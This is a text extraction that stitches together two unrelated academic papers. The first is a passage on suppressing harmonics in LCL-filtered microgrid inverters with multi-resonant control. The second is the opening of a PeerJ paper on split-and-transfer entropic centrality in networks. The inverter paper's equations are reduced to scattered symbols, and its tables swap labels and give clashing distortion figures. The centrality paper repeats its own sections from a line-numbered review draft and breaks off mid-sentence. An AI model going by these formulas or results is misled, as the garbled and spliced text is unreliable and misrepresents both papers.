reduce the quality of power supply a series of problems, give the user the safe and security, economic operation of power system brings great harm. so harmonic suppression is very important. Current research of harmonic suppression methods, mainly has: the harmonic suppression method based on active filter [1] [2] [3]; the micro-grid harmonic suppression based on virtual impedance [4]; LCL type Grid-connected inverter harmonic suppression [5] [6] [7] [8] and so on. Compared to L-filter, LCL-type filter has a third-order low-pass filter characteristics,( LCL filter with third order low pass filter properties), so for the same harmonic standard and lower switching frequency, we can use a relatively small filter inductor design, effectively reduce the system size(volume) and reduce losses, but the same will bring resonance problems. In this paper, a harmonic control strategy of micro-grid inverter based on PI control, multi-resonance control and LCL constant power control is proposed, which is used in the process of grid-connected control of micro-grid inverter to further reduce and net voltage of the total harmonic distortion rate, get better power of the grid. II. MATERIAL AND METHODS A. Principle block diagram of multi resonance LCL harmonic suppression strategy Figure 1 is LCL multi-resonant constant power grid control system block diagram. Where ref P ref Q are the International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 24 actual active and reactive power reference values, abc v 、 abc i are the actual values of the grid voltage and current, d v 、 q v and d i 、 q i are the voltage components of the dq axis, dref i and qref i are the capacitor current reference Value, cd i 、 cq i 、 cdref i 、 cqref i are the capacitance current detection value on the dq axis components and capacitance current reference value. The figure includes PQ control module, current loop multi-resonance control module, and PWM modulation module etc. Micro-network inverter grid output voltage abc v and current detection values oabc i ,after coordinate transformation to get 、 and 、 ,will be sent to the PQ controller; PQ controller according the active and reactive setpoint ref P and ref Q to calculate the current reference values and and then compare with the current detection value of the components and . And after the ratio multi-resonant regulator in the current loop control module, the reference values , of the capacitive current are obtained, then compared with the capacitance current detection value αβ component and . And then adjusted by the proportional regulator G_1 (S), the control PWM circuit drives the inverter, so that the inverter output active power and reactive power constant. In order to meet the requirements of system stability, the current loop control module in Figure 1 solves the resonance problem caused by LCL, and achieves the purpose of suppressing low frequency harmonics and improves the system accuracy. Figure 1. Principle block diagram of multi resonance LCL harmonic suppression strategy B. Multi - resonant LCL Grid - connected Control Mathematical Model Figure 1 constitutes a third-order LCL-type filter, where 1 L is the inductance, 1 R is its internal resistance and the equivalent resistance between the upper and lower legs of each phase, 2 R is the internal resistance of 2 L . In the case of three-phase grid voltage symmetry, the mathematical model is as follows:                1 2 1 1 1 2 2 2 dc k NO s di t di t L R i t L R i t dt dt U t S t U U t              1 2 c du t C i t i t dt             , , dc dc dc k k k a b c du t i t C i t S t dt             , ,3 dc NO k k a b c u t U t S t      International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 25 Where k S is the switching function of the power switching device, when 0 k S  , the upper arm is turned on and the lower arm is turned off; When 1 k S  , the upper arm off, the lower arm conduction. Corresponding to the relationship between α and β stationary coordinate system is as follows:  1 1 1 1 1 1 1 1 2 2 2 2 2 2 2 2 1 2 1 2 ca c c c c c di L u u R i dt di L u u R i dt di L u e R i dt di L u e R i dt i i i i i i                                       1 i  、 1 i  、 2 i  、 2 i  are the α and β components of the input and output currents in the αβ coordinate system; c i  、 c i  、 c u  、 c u  are the α and β components of the capacitive current and voltage in the αβ coordinate system; e  and e  are the α and β components of the grid voltage in the αβ coordinate system. C. A block diagram of current loop control LCL-type filter in the better suppression of high-frequency harmonics at the same time, because of its own structure for a third-order system, easy to produce resonance, the frequency near the narrow band and too high gain, will lead to the system and the load Parameter changes are very sensitive, affecting the stability of the system to bring a series of impact and harm to the grid. In order to reduce its sensitivity and high gain characteristics, to achieve the AC signal without static tracking, this paper on the basis of the use of active damping introduced into the capacitor current loop regulation to suppress high frequency interference, and the external loop current using proportional resonance control , Constructs a transfer function that performs AC compensation on the reference input signal. So that in a specific bandwidth in the same frequency response characteristics, to meet the system stability requirements, so that the output at the resonant frequency at high gain, the other frequency segment attenuation. Thus reducing the resonance, improve the stability of the system and control accuracy. The control block diagram is showas follows: Figure 2. Block diagram of current loop control As shown in Figure 2 where selected proportional resonance regulator, selected proportional regulator. After the current is transformed by the coordinate, the voltage and current 、 and 、 in the two stationary coordinates are obtained and sent to the PQ calculation module to obtain the reference current 、 ,and then compared with and obtained the deviation by the proportionmulti-resonant regulator in the current loop control module , get the capacitor current reference value and , And it is compared with the capacitance current detection value αβ component and , after adjusting the proportional regulator , then control PWM circuit drives the inverter, so that the inverter output active power and reactive power constant. D. PR control Since the PR regulator is equivalent to the PI modulator in the stationary coordinate system under the αβ coordinate, International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 26 the PR regulator can also be used to design the PI regulator parameter. Figure 2 in the parallel current and reference current deviation, through the multi-resonant control get the capacitor current reference value cref i ， cref i and the actual capacitance of the current deviation, and then through the proportional control, the resulting signal through the PWM modulation to achieve active damping control. The use of a proportional feedback control of the capacitor current, stabilize the capacitor voltage, and enhance the stability of the system. The parallel current and capacitive current transfer functions are as follows:        2 4 3 2 1 2 2 ref PWM PWM i PWM PWM PWM i I S G S I s KK K s KK K L L Cs KK L Cs Ls KK s KK K          The corresponding characteristic equation is:    4 3 21 2 2PWM PWM PWM i D S L L Cs KK L Cs Ls KK s KK K       According to the Rouse stability criterion, the system stability condition is calculated as:    2 1 1 2 1 0 PWM i K L L K L K L KK K L C          According to the stability criterion (formula 9) to set the parameters, so that when the grid to reach a stable state. III. MULTIPLE PR CONTROL A single PR regulator generates an infinite gain at a specific frequency. In order to ensure its stability and easy to achieve, using the approximate structure; its transfer function is as follows:The transfer function is as follows: hwcs s wcs wh (9) Where is the scale factor, is the frequency adjustment coefficient, is the resonance coefficient, and is the resonant frequency. In order to achieve the 5,7,11 harmonic current compensation need to re-connect three resonant controller. The transfer function of the current inner loop multi-resonance controller is:  The minimum value of the resonant frequency in the LCL grid-connected inverter is: (11) Then the minimum value of K is:  In order to ensure the stability of the control system, the cutoff frequency should be chosen to be less than so the in the multi-resonance PR control can be approximated by the cutoff frequency :  According to the scope of K and the specific control requirements, through the control system open-loop baud diagram for parameter adjustment. IV. DISCUSSION Based on the detailed analysis of the principle of multi-resonance constant power control, the simulation results of the mathematical model are as follows International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 27 Figure 3. DC side voltage control after active, no power waveform As shown above, the active and reactive power of the output after LCL multi-resonant constant power control is constant, which ensures the stable operation of the system. Figure 4. By LCL multi-resonant constant power control before and after the voltage waveform From Fig. 4, we can find that the voltage and current waveforms before the LCL multi-resonant constant power control are unstable and distorted. After the control of the voltage and current waveform is improved, harmonic suppression effect is obvious. Figure 5. By LCL multi-resonant constant power control before and after the current waveform From the above figure can be found by the LCL multi-resonant constant power control after the current waveform has improved. In order to analyze the filtering effect by LCL multiresolution constant power control, the voltage distortion rate, the total voltage distortion rate and the current distortion rate of the respective voltage waveforms before and after the control are summarized as shown in Table 1 and 2 respectively. TABLE I. LCL MULTI-RESONANT CONSTANT POWER GRID-CONNECTED CONTROL BEFORE AND AFTER THE VOLTAGE HARMONIC CONTENT Voltage distortion rate current distortion rate Before filtering 76.03% 15.23% After filtering 0.12% 0.02% TABLE II. LCL MULTI-RESONANT CONSTANT POWER CONTROL BEFORE AND AFTER THE VOLTAGE AND CURRENT DISTORTION Number of harmonics 5 7 11 Before filtering 2.86% 0.93% 0.98% After filtering 0.08% 0.04% 0.01% From Table 1, it can be found that the contents of the harmonics before the filtering are reduced and have an inhibitory effect. International Journal of Advanced Network, Monitoring and Controls Volume 03, No.03, 2018 28 Table 2 can be seen by LCL multi-resonant constant power control filter before the voltage distortion rate of 76.03%, a phase current distortion rate of 15.23%, filtered voltage distortion rate reduced to 0.12%, the corresponding phase current distortion Small to 0.02 inhibitory effect is obvious. V. CONCLUSION In this paper, a harmonic suppression strategy for micro-grid inverter combined with LCL constant power control and multi-resonant PI control is proposed for the resonant problem of LCL filter microgrid inverters. It is found that the scheme stabilizes the output power LCL and reduces the total harmonic distortion rate of the grid inverter to 0.12% and the corresponding phase current distortion rate is reduced to 0.02%. The harmonic suppression effect is obvious. REFERENCES [1] Shang taohong. Study and parameter design of shunt hybrid active power filter [J] proceedings of the computer science, 2012, 29 (11): 327-330. [2] Li Yan, Luo an, Fang Lu, Wang Wen. High voltage type hybrid active power filter [J]. Journal of electric technology, 2013, 28 (6): 147-157 [3] Wang Jidong, Qin Meicui. Micro grid harmonic suppression method [J]. Journal of Tianjin University APF based on the (Science and Technology Edition), 2015, 48 (7): 637-642 [4] Li Li. Study on hierarchical control and power quality improvement of microgrid [D]. Beijing: North China Electric Power University, 2015 [5] Han Yongru, Xue Shilong, and Study on the control strategy of grid connected inverter based on LCL filter [J]. Shanghai: Maritime University, 2015, 1 (103-109): (in Chinese) [6] Huang Yafeng, Li Long, Yan Gangui large capacity PV inverter LCL filter parameter optimization design [J]. Beijing: North China Electric Power University, 2013, 41 (21): 104-110 [7] Zhang Xing, Li Fei, and in the grid connected inverter LCL filter improved topology [J]. Hefei: HeFei University of Technology, 2014,6:10-17 [8] Xu Jinming, Xie Shaojun, L L filter grid connected inverter robust current control [J]. Nanjing: Nanjing University of Aeronautics and Astronautics, 2012,36 (19): 99-104 [9] Yang Kun, Xie Chuan, Chen Guozhu. Current control of static reactive power generator based on frequency adaptive resonance controller [J]. Journal of electrical engineering, 2014, 29 (8): 249-254. [10] Zhang Zhicheng, Liu Zhenlai, Guan Huchang. Island micro grid harmonic control method of [J]. power electronic technology, 2015, 49 (12): 135-13 Chen Jingwen (1978-), male (Han nationality), Inner Mongolia Chifeng people, associate professor, graduate tutor, research direction for micro-grid technology and application, E-mail: chenjw@sust.edu.cn Zhou Xin (1993-), female (Han), Xianyang, Shaanxi, Master, research direction for micro-grid harmonics, inter-harmonics of the study Dang hongshe(1962-), male (Han nationality), ShaanXiXianyang people, professor, research direction for micro-gridtechnology and application, (Corresponding author: E-mail: 2452744621@qq.com) mailto:2452744621@qq.com work_t5ywgdkj2zf2vla3p2ylgicvhe ---- Submitted 15 December 2018 Accepted 22 August 2019 Published 16 September 2019 Corresponding author Anwitaman Datta, anwitaman@ntu.edu.sg Academic editor Diego Amancio Additional Information and Declarations can be found on page 19 DOI 10.7717/peerj-cs.220 Copyright 2019 Oggier et al. Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS A split-and-transfer flow based entropic centrality Frédérique Oggier1,*, Silivanxay Phetsouvanh2 and Anwitaman Datta2,* 1 Division of Mathematical Sciences, Nanyang Technological University, Singapore, Singapore 2 School of Computer Science and Engineering, Nanyang Technological University, Singapore, Singapore * These authors contributed equally to this work. ABSTRACT The notion of entropic centrality measures how central a node is in terms of how uncertain the destination of a flow starting at this node is: the more uncertain the destination, the more well connected and thus central the node is deemed. This implicitly assumes that the flow is indivisible, and at every node, the flow is transferred from one edge to another. The contribution of this paper is to propose a split-and- transfer flow model for entropic centrality, where at every node, the flow can actually be arbitrarily split across choices of neighbours. We show how to map this to an equivalent transfer entropic centrality set-up for the ease of computation, and carry out three case studies (an airport network, a cross-shareholding network and a Bitcoin transactions subnetwork) to illustrate the interpretation and insights linked to this new notion of centrality. Subjects Data Mining and Machine Learning, Data Science Keywords Entropy, Centrality, Information flow INTRODUCTION Centrality is a classical measure used in graph theory and network analysis to identify important vertices. The meaning of ‘‘important’’ depends on the nature of the problem analyzed, e.g., hubs in networks, spreaders of a disease, or influencers in social networks. Commonly used centrality measures include: the degree centrality which is the degree (or in-degree/out-degree) of the vertex depending on whether the graph is directed, possibly normalized to get the fraction of vertices a given vertex is connected to; the closeness centrality which is the reciprocal of the sum of the shortest path distances from a given vertex to all others, typically normalized, and indicates how close a given vertex is to all other vertices in the network; the betweenness centrality which is the sum of the fraction of all pairs of shortest paths that pass through it, indicating the extent to which a given vertex stands between other vertex pairs (see e.g., Estrada, 2011 for a survey of different centrality measures and how centralities fit into the more general framework of complex networks). These were extended to weighted graphs, though at the risk of changing the interpretation of the measure, e.g., one may use weighted degrees instead of degrees, but this measure does not count the number of neighbors anymore (see e.g., Opsahl, Agneessens & Skvoretz, 2010 for a discussion on using the above cited centrality measures for weighted graphs). Another way to determine centrality is to assign as centrality a (scaled) average How to cite this article Oggier F, Phetsouvanh S, Datta A. 2019. A split-and-transfer flow based entropic centrality. PeerJ Comput. Sci. 5:e220 http://doi.org/10.7717/peerj-cs.220 mailto:anwitaman@ntu.edu.sg https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.220 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.220 of the centralities of the neighbors. This is the idea behind eigenvector centrality discussed by Newman (2009), which was already debated by Bonacich (1972), who later generalized it to alpha centrality (Bonacich & Lloyd, 2001). Alpha centrality introduces an additive exogenous term, which accounts for an influencing factor which does not depend on the network structure. Though Katz centrality (Katz (1953)) relies on the idea that importance is measured by weighted numbers of walks from the vertex in question to other vertices (where longer walks have less weights than short ones), it turns out that the alpha centrality and Katz centrality differ by a constant term. With these three centralities, a highly central vertex with many links tends to endorse all its neighbors which in turn become highly central. However one could argue that the inherited centrality should be diluted if the central vertex is too magnanimous in the sense that it has too many neighbors. This is solved by Page Rank centrality, which is based on the PageRank algorithm developed by Page et al. (1999). Iannelli & Mariani (2018) proposed ViralRank as a new centrality measure, defined to be the average random walk effective distance to and from all the other nodes in the network. This measure is meant to identify influencers for global contagion processes. Benzi & Klymko (2015) showed that a parameterized random walk model can capture the behavior of a gamut of centrality measures, including degree centrality (walks of length one) and eigenvector based centrality models (considered as infinite walks), which contain the eigenvector and Katz centralities as particular cases. This parameterized model helps explain and interpret the high rank correlation observed among degree centrality and eigenvector based centralities. Schoch, Valente & Brandes (2017) argues that the role of the network structure itself should not be underestimated when looking at correlations among centralities. Notwithstanding this high rank correlation among centrality measures, each measure captures the vertex importance subject to a certain interpretation of importance, which is a key rationale behind studying different centrality models in different contexts. A seminal work by Borgatti (2005) looked at which notion of centrality is best suited given a scenario, by characterizing the scenario as a flow circulating over a network: a typology of the flow process is given across two dimensions, the type of circulation (parallel/serial duplication, transfer) and the flow trajectories (geodesics, paths, trails, or walks): a flow may be based on transfer, where an item or unit flows in an indivisible manner (e.g., package delivery), or by serial replication, in which both the node that sends the item and the one that receives it have the item (e.g., one-to-one gossip), or parallel duplication, where an item can be transmitted in parallel through all outgoing edges (e.g., epidemic spread). It was shown for example that betweenness is best suited for geodesics and transfer, while eigenvector based centralities should be used for walks and parallel duplication. Indeed, betweenness is based on shortest paths, suggesting a target to be reached as fast as possible, and thus fitting transfer. Using Katz’s intuition, eigenvector based centralities count possible unconstrained walks, and they are consistent with a scenario where every vertex influences all of its neighbors simultaneously, which is consistent with parallel deduplication. This flow characterization is of interest for this work, since we will be looking at a case where a flow is actually not just transferred, but also split among outgoing edges, with the possibility to partly remain at any node it encounters. This scenario could typically be motivated by Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 2/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 financial transactions, which are transferred, not duplicated. However when transferred, the flow of money is not indivisible. Based on Borgatti’s typology, a measure of centrality for transfer should be based on paths rather than eigenvectors. This is indeed the approach that we will explore. Our starting point is the notion of entropic centrality as proposed by Tutzauer (2007). A (directed) graph G= (V,E) with vertex set V and edge set E is built whose edges are unweighted. To define the centrality of u∈V , the probability pu,v that a random walk constrained to not revisit any vertex (thus, only forming paths) starting at u terminates at v is computed. To model the stoppage of flow/walk at any vertex, an edge to itself (self-loop) is added. The process of computing pu,v is thus to consider a constrained random walk to start at node u, and at every node w encountered in the path, to choose an outgoing edge uniformly at random among the edges leading to unvisited nodes (or choosing the self-loop to terminate the walk). Then the entropic centrality CH(u) of u is defined to be CH(u)=− ∑ v∈V pu,vlog2pu,v. (1) This notion of entropic centrality was adapted in Nikolaev, Razib & Kucheriya (2015) to fit a Markov model, where instead of paths, unconstrained random walks are considered, for computational efficiency. In general, how to compute centrality at scale is an interesting direction of study in its own right, e.g., Fan, Xu & Zhao (2017), but this is somewhat orthogonal to the emphasis of the current work. In this work we revisit and generalize the original concept of entropic centrality to make it more flexible. To do so, we first interpret the ‘‘transfer’’ centrality proposed in Tutzauer (2007) as having (1) an underlying graph, where every edge has a probability which is that of being chosen uniformly at random among the other outgoing edges of a given vertex, and (2) an indivisible flow which starts at a vertex u, and follows some path where the probability to choose an edge at every vertex in this path is given by the probability attached to this edge, taking into account unvisited neighbors, to reach v. Since the flow is indivisible, the self-loop represents the probability for this flow to stop at a given vertex. In our generalization, we similarly assume that we have (1) an underlying graph, only now the probability attached to each edge depends on the scenario considered and could be arbitrary, (2) the flow used to measure centrality can split among neighbors, by specifying which subsets it goes to with which probability, at every vertex it encounters (as per a flow in the traditional network analysis sense, flow conservation applies, meaning that the amount of flow that goes out of u is the same amount of flow that reaches all of its neighbors). Again, a self-loop is an artifact introduced to capture the effect of the flow on vertices, even if none of the flow actually remains in the vertex (As in Nikolaev, Razib & Kucheriya, 2015, a zero probability would otherwise render zero contribution to the entropic centrality calculation). While the underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops needed for the mathematical model. This should be determined based on the scenario being modeled. The above motivates the notion of a split-and-transfer entropic centrality. Since propagation of flow is an indicator of spread over the network, we will also consider a scaled Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 3/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 version of entropic centrality, where a multiplicative factor is introduced to incorporate additional information, which may suggest an a priori difference of importance among the vertices, for instance, if the data suggests that some vertices handle volume of goods much larger than other vertices. The contributions of this work are to (1) introduce the above framework for split-and- transfer entropic centrality, (2) show in ‘The transfer entropic centrality’ that transfer centrality can be easily extended to consider arbitrary probabilities on graph edges and (3) prove that computing the split-and-transfer entropic centrality can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities (which is crucial from a practicality perspective), as shown in Proposition 1 of ‘The transfer entropic centrality’. Studies that showcase and explore our technique are provided in ‘Case Studies’: (i) a cross-shareholding network representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of wallet addresses from the Bitcoin network, which originally motivated the study of split-and-transfer flows, and (iii) an airport network. Comparisons with other standard centralities (alpha, Katz, betweenness and PageRank) are given, showing that the entropic centrality captures different features. THE NOTION OF SPLIT-AND-TRANSFER ENTROPIC CENTRALITY The transfer entropic centrality Consider the network shown on Fig. 1A and assume that the probability of an indivisible flow going from one vertex to another is uniform at random (including the option to remain at the current vertex). For a flow starting at v1, there is then a probability 1 4 to go to v4, and a probability 1 2 to continue to v5, so the probability to go from v1 to v5 following the path (v1,v4,v5) is 1 8. But since it is also possible to reach v5 from v1 using v3 instead, an event of probability 18, we have that the probability pv1,v5 for an indivisible flow to start at v1 and stop at v5 is pv1,v5 = 1 4. Similarly, we compute pv1,v1,pv1,v2,pv1,v3 and pv1,v4, and the transfer entropic centrality CH(u) of u=v1 is CH(v1)= 3 4log24+ 2 8log2(8)=2.25 by (1). For a point of comparison, on the right of the same figure, we change the probability to go out of v1, such that the edge (v1,v2) is chosen with a probability 1 2, while the probability is 16 for using the edges to the other vertices (including a probability 1 6 that the flow just stays at v1 itself). The resulting probabilities are provided on Fig. 1B. There is no complication in computing CH(v1) using (1) with non-uniform probabilities. This reduces slightly the centrality of v1, which is consistent with the interpretation of entropic centrality: the underlying notion of entropy is a measure of uncertainty (Tutzauer, 2007), the uncertainty of the final destination of a flow, knowing that it started at a given vertex. Imagine the most extreme case where the edge (v1,v2) is chosen with a probability 1, then even though v1 has three potential outgoing neighbors, two of them are used with probability 0, so the centrality of v1 would reduce considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v1. The notion of transfer entropic centrality captured by (1) assumes that there is no vertex repetition in the paths taken by the flow. Figure 2 illustrates this hypothesis. Again for Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 4/21 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.220 v1 v3v2 v4 v5 pv1,v2 = 1 4 pv1,v1 = 1 4 pv1,v3 = 1 8 pv1,v4 = 1 8 pv1,v5 = 1 4 CH(v1) = 2.25. 1 4 1 1 2 1 2 1 1 4 1 4 1 4 1 2 1 2 (a) v1 v3v2 v4 v5 pv1,v2 = 1 2 pv1,v1 = 1 6 pv1,v3 = 1 12 pv1,v4 = 1 12 pv1,v5 = 1 6 CH(v1) ≈ 1.959. 1 6 1 1 2 1 2 1 1 2 1 6 1 6 1 2 1 2 (b) Figure 1. The transfer entropic centrality CH(v1) of v1 is computed using (1), for a uniform edge distribution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvisited neighbors) in (1a), and for a non-uniform distribution in (1b). reaches all of its neighbors). Again, a self-loop is an artifact introduced to capture the effect of the flow92 on vertices, even if none of the flow actually remains in the vertex (As in (Nikolaev et al. (2015)), a zero93 probability would otherwise render zero contribution to the entropic centrality calculation). While the94 underlying phenomenon may have self-loops, they may or not be directly used to determine the self-loops95 needed for the mathematical model. This should be determined based on the scenario being modeled.96 The above motivates the notion of a split-and-transfer entropic centrality. Since propagation of flow97 is an indicator of spread over the network, we will also consider a scaled version of entropic centrality,98 where a multiplicative factor is introduced to incorporate additional information, which may suggest an a99 priori difference of importance among the vertices, for instance, if the data suggests that some vertices100 handle volume of goods much larger than other vertices.101 The contributions of this work are to (1) introduce the above framework for split-and-transfer entropic102 centrality, (2) show in Subsection 2.1 that transfer centrality can be easily extended to consider arbitrary103 probabilities on graph edges and (3) prove that computing the split-and-transfer entropic centrality104 can be reduced to transfer entropic centrality over a graph with suitable equivalent edge probabilities105 (which is crucial from a practicality perspective), as shown in Proposition 1 of Subsection 2.1. Studies106 that showcase and explore our technique are provided in Section 3: (i) a cross-shareholding network107 representing portfolio diversification, that illustrates the versatility of our framework (ii) a subgraph of108 wallet addresses from the Bitcoin network, which originally motivated the study of split-and-transfer109 flows, and (iii) an airport network. Comparisons with other standard centralities (alpha, Katz, betweenness110 and PageRank) are given, showing that the entropic centrality captures different features.111 2 THE NOTION OF SPLIT-AND-TRANSFER ENTROPIC CENTRALITY112 2.1 The Transfer Entropic Centrality113 Consider the network shown on Figure 1a and assume that the probability of an indivisible flow going114 from one vertex to another is uniform at random (including the option to remain at the current vertex).115 For a flow starting at v1, there is then a probability 1 4 to go to v4, and a probability 1 2 to continue to v5, so116 the probability to go from v1 to v5 following the path (v1,v4,v5) is 1 8 . But since it is also possible to reach117 v5 from v1 using v3 instead, an event of probability 1 8 , we have that the probability pv1,v5 for an indivisible118 flow to start at v1 and stop at v5 is pv1,v5 = 1 4 . Similarly, we compute pv1,v1 , pv1,v2 , pv1,v3 and pv1,v4 , and119 the transfer entropic centrality CH(u) of u = v1 is CH(v1) = 3 4 log2 4 + 2 8 log2(8) = 2.25 by (1).120 For a point of comparison, on the right of the same figure, we change the probability to go out of v1,121 such that the edge (v1,v2) is chosen with a probability 1 2 , while the probability is 1 6 for using the edges to122 the other vertices (including a probability 16 that the flow just stays at v1 itself). The resulting probabilities123 are provided on Figure 1b. There is no complication in computing CH(v1) using (1) with non-uniform124 probabilities. This reduces slightly the centrality of v1, which is consistent with the interpretation of125 3/14 PeerJ Comput. Sci. reviewing PDF | (CS-2018:12:33449:4:0:NEW 13 Aug 2019) Manuscript to be reviewedComputer Science Figure 1 The transfer entropic centrality CH (v1) of v1 is computed using (1), for a uniform edge distri- bution (the choice of an edge at a given vertex is chosen uniformly at random among choices of unvis- ited neighbors) in (A), and for a non-uniform distribution in (B). Full-size DOI: 10.7717/peerjcs.220/fig-1 v1 v3v2 v4 v5 pv1,v2 = 1 4 pv1,v1 = 1 4 pv1,v3 = 1 8 pv1,v4 = 1 8 pv1,v5 = 1 4 CH(v1) = 2.25. 1 1 2 1 3 1 1 3 1 2 1 3 1 4 1 4 1 4 1 4 (a) v1 v3v2 v4 v5 pv1,v2 = 1 2 pv1,v1 = 1 6 pv1,v3 = 1 12 pv1,v4 = 1 6 1 5 pv1,v5 = 1 6 4 5 + 1 6 1 2 CH(v1) ≈ 2.0795. 1 2 1 2 1 6 1 1 6 1 2 2 3 1 6 1 2 1 6 1 6 (b) Figure 2. An example of transfer centrality involving already visited neighbors. If probabilities are uniform at random (2a), they are scaled according to the number of unvisited neighbors. If not (2b), they are scaled proportionally to the existing probabilities. entropic centrality: the underlying notion of entropy is a measure of uncertainty (Tutzauer (2007)), the126 uncertainty of the final destination of a flow, knowing that it started at a given vertex. Imagine the127 most extreme case where the edge (v1,v2) is chosen with a probability 1, then even though v1 has three128 potential outgoing neighbors, two of them are used with probability 0, so the centrality of v1 would reduce129 considerably, as expected, since there is no uncertainty left regarding the destination of a flow at v1.130 The notion of transfer entropic centrality captured by (1) assumes that there is no vertex repetition131 in the paths taken by the flow. Figure 2 illustrates this hypothesis. Again for the centrality of v1, a flow132 leaves v1, it can go to either v2, v3 or v4. When reaching v4, the flow cannot go back to v1, since v1133 is already visited (and going back would not give a path anymore), there the probabilities to stay at v4134 and to go to v5 from v4 are modified. On the left, when probabilities are uniform, since now only two135 outgoing edges of v4 are available, namely edges (v4,v4) and (v4,v5), each is assigned a probability of 1 2 .136 On the right, when probabilities are not uniform, we distribute the probability of going to some visited137 vertex proportionally to the rest of the available edges. Since 46 is going to v5 while 1 6 is staying at v4, we138 have 4 and 1 out of 5 respectively leaving and staying, thus obtaining the renormalized probabilities as139 4 6 + 4 5 1 6 = 4 5 and 1 6 + 1 5 1 6 = 1 5 .140 The examples of Figures 1 and 2 illustrate diverse cases of indivisible flow. By definition of indivis-141 ibility, the choice of an edge at a vertex u corresponds to choosing subsets containing one vertex only142 in the list of all subsets of neighbors. We can thus set a probability 0 to all subsets which contain more143 than one vertex. Therefore, the definition of entropic centrality in (1), with or without uniform edge144 probabilities, are particular cases of the proposed split-and-transfer framework, that we discuss next.145 2.2 The Split-and-Transfer Entropic Centrality146 Consider the network of Figure 3 depicting a seller v1 whose direct customers are v2,v3,v4. Say we147 further know that when v1 distributes a new batch of items, he does so to either customers {v2,v3} or148 {v3,v4}, and in fact, the pair {v3,v4} is preferred (they receive 2/3 of the batches, versus 1/3 for the149 group {v2,v3}). Furthermore, in the first case, v2 receives a higher volume than v3 (say 2/3 of the batch150 goes to v2), while for the second case, v4 takes 3/4 of the batch shared with v3. Once v3,v4 obtain the151 items, they typically keep half for themselves, and distribute the other half to v5.152 To compute the centrality of v1, we consider a divisible flow starting at u = v1 which can split among153 different paths instead of following one. To model the choice of splitting among possible neighbors,154 we first define a probability q(x) over the set Eu = { {v1}, {v2}, {v3}, {v4}, {v1,v2}, {v1,v3}, {v1,v4},155 {v2,v3}, {v2,v4}, {v3,v4}, {v1,v2,v3}, {v1,v2,v4}, {v1,v3,v4}, {v2,v3,v4}, {v1,v2,v3,v4} } such that,156 for our example, q({v2,v3}) = 13 , q({v3,v4}) = 2 3 , and q(x) = 0 for other choices of x (in contrast to157 (Oggier et al. (2018c)) where it was chosen to be uniformly at random). This represents the fact that 1/3158 of the time, v1 sends the goods to the pair {v2,v3} (as shown in Figure 3a), while for the rest of the time,159 4/14 PeerJ Comput. Sci. reviewing PDF | (CS-2018:12:33449:4:0:NEW 13 Aug 2019) Manuscript to be reviewedComputer Science Figure 2 An example of transfer centrality involving already visited neighbors. If probabilities are uni- form at random (A), they are scaled according to the number of unvisited neighbors. If not (B), they are scaled proportionally to the existing probabilities. Full-size DOI: 10.7717/peerjcs.220/fig-2 the centrality of v1, a flow leaves v1, it can go to either v2, v3 or v4. When reaching v4, the flow cannot go back to v1, since v1 is already visited (and going back would not give a path anymore), there the probabilities to stay at v4 and to go to v5 from v4 are modified. Oggier et al. (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.220 5/21 https://peerj.com https://doi.org/10.7717/peerjcs.220/fig-1 https://doi.org/10.7717/peerjcs.220/fig-2 http://dx.doi.org/10.7717/peerj-cs.220 v1 v3v2 v4 v5 0 1 1 2 1 2 1 0 1 2 1 2 2 3 1 3 (a) v1 v3v2 v4 v5 0 1 1 2 1 2 1 0 1 2 1 2 3 4 1 4 (b) u v3v2 v4 v5 0 1 1 2 1 2 1 2 9 5 18 1 2 1 2 1 2 (c) Figure 3. An example of split-and-transfer entropic centrality: on (3a) in red, the event corresponding to choosing {v2,v3}, in (3b), the event {v3,v4}. The probabilities pu,v are computed by summing over both events, weighted by the respective event probability: pv1,v2 = 1 3 ( 2 3 ) = 2 9 , pv1,v4 = 2 3 ( 3 8 ) = 1 4 , pv1,v3 = 1 3 ( 1 6 )+ 2 3 ( 1 8 ), pv1,v5 = 1 3 ( 1 6 )+ 2 3 ( 1 8 + 3 8 ). This gives CH(v1) ≈ 1.9076. it sends it to the pair {v3,v4} (shown in Figure 3b). We compute the path probabilities for each event, for160 q({v2,v3}) = 13 and for q({v3,v4}) = 2 3 accordingly.161 We have further information: when v1 deals with {v2,v3}, there is a bias of 23 for v2 compared to 1 3162 for v3, and the bias is of 3 4 for v4 in the other case. The corresponding probabilities are attached to the163 edges {(v1,v2),(v1,v3)} and {(v1,v3),(v1,v4)} respectively (shown in Figure 3c). Now that the edge164 probabilities are defined, we can compute the path probabilities. For example, from v1 to v5, we sum up165 the path probabilities for both events, weighted by the respective event probability: 13 ( 1 6 )+ 2 3 ( 1 8 + 3 8 ).166 We next provide a general formula. We let a flow start at a vertex whose centrality we wish to compute,167 and at some point of the propagation process, a part fu of the flow reaches u. Let Nu be the neighborhood168 of interest given fu, that is, the set of outgoing neighbors which have not yet been visited by the flow.169 Every outgoing edge (u,v) of u exactly corresponds to some outgoing neighbor v, so in what follows,170 we may refer to either one or the other. Let Eu denote the set of possible outgoing edge subsets (where171 every edge (u,v) is represented by v the neighbor). We attach a possibly distinct probability q(x) to every172 choice x in Eu. Then ∑x∈Eu q(x) = 1.173 Every x in Eu corresponds to a set of edges (u,v) for v a neighbor. We further attach a weight ωx(u,v)174 to every edge in x, with the constraint that ∑(u,v)∈x ωx(u,v) = fu. For 